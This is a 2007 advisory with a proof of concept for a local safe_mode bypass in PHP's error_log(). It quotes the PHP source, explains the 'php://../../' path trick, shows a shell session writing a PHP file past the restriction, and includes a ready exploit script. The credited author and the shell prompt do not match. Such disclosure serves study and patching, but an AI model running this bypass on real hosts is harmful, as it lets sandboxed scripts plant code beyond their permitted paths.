PHP <= 4.4.4 / 5.2.1 / 5.1.6 error_log() Safe Mode Bypass Vulnerability

SecurityRisk : DEN
Remote Exploit : No
Local Exploit : Yes
Exploit Given : Yes
Credit : The-WolF-kSA
Date : 24.3.2007


Affected Software : PHP 5.2.1 / 5.1.6 / 4.4.4


[error_log() Safe Mode Bypass PHP 5.2.1 / 5.1.6 / 4.4.4]

Author: ThE-WoLf-KsA
Date:
- Written: 24.3.2007


--- 0. Description ---

error_log() with message_type 3 appends its message to the file named by the third argument. Under safe_mode / open_basedir that write is supposed to be confined to what the script is allowed to touch, but the destination is opened with the IGNORE_URL flag, and a destination of the form "prefix://../../path" is accepted and written to even when the plain path is refused. The function whose source is quoted below is _php_error_log() from ext/standard/basic_functions.c; the example and the exploit call error_log($message, 3, $destination).

--- 1. error_log() Safe Mode Bypass ---
error_log() writes a message to the server log, sends it by mail, or appends it to a file. The file case is the interesting one. The stream layer does check safe_mode and open_basedir when it opens the destination, and a URL is not supposed to be usable there; the problem is that a malformed filename carrying a URL-style prefix is still accepted and still ends up on disk.

PHP 5:
--- lines 2013-2050 ---
/* Helper behind error_log(): opt_err is the message_type argument, opt the
   destination (mail address or file name), headers the extra mail headers. */
PHPAPI int _php_error_log(int opt_err, char *message, char *opt,
                          char *headers TSRMLS_DC)
{
    php_stream *stream = NULL;

    switch (opt_err) {

        case 1:     /* send an email */
            {
#if HAVE_SENDMAIL
                if (!php_mail(opt, "PHP error_log message",
                              message, headers, NULL TSRMLS_CC)) {
                    return FAILURE;
                }
#else
                php_error_docref(NULL TSRMLS_CC, E_WARNING,
                                 "Mail option not available!");
                return FAILURE;
#endif
            }
            break;

        case 2:     /* send to an address */
            php_error_docref(NULL TSRMLS_CC, E_WARNING,
                             "TCP/IP option not available!");
            return FAILURE;
            break;

        case 3:     /* save to a file */
            /* IGNORE_URL: the destination goes to the plain-file wrapper
               even when it looks like a URL (see below). */
            stream = php_stream_open_wrapper(opt, "a",
                         IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
            if (!stream)
                return FAILURE;
            php_stream_write(stream, message, strlen(message));
            php_stream_close(stream);
            break;

        default:
            php_log_err(message TSRMLS_CC);
            break;
    }
    return SUCCESS;
}
--- lines 2013-2050 ---

Look at option 3.

--- line 2038 ---
stream = php_stream_open_wrapper(opt, "a",
             IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
--- line 2038 ---

Mode "a" appends to the file and creates it if it does not exist.
The problem is that php_stream_open_wrapper() is called with
IGNORE_URL. With that flag the destination is not dispatched to a
URL wrapper: a string such as "prefix://../../path" is handed straight
to the plain-file wrapper, the safe_mode restriction does not reject
the prefixed string, and the "../../" walks the path back to the real
target when it is opened. In effect, "prefix://../../" switches
safe_mode off for this write.
--- Example ---
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");'

Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1

Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
-rw-r--r--  1 cxib  www  16 Jun 11 17:47 /www/temp/sr.php
cxib#
--- Example ---

--- 2. Exploit ---
<?php
// Target file, reached through the "php://../../" walk-back; left empty
// here, set it before running.
$file = ""; # FILENAME
// message_type 3 appends the first argument to the destination file.
error_log("<? echo \"cx\"; ?>", 3, "php://../../" . $file);
?>



--- 3. Greets ---
SniPer_hex

--- 4. Contact ---
ThE-WolF-ksA@hotmail.com
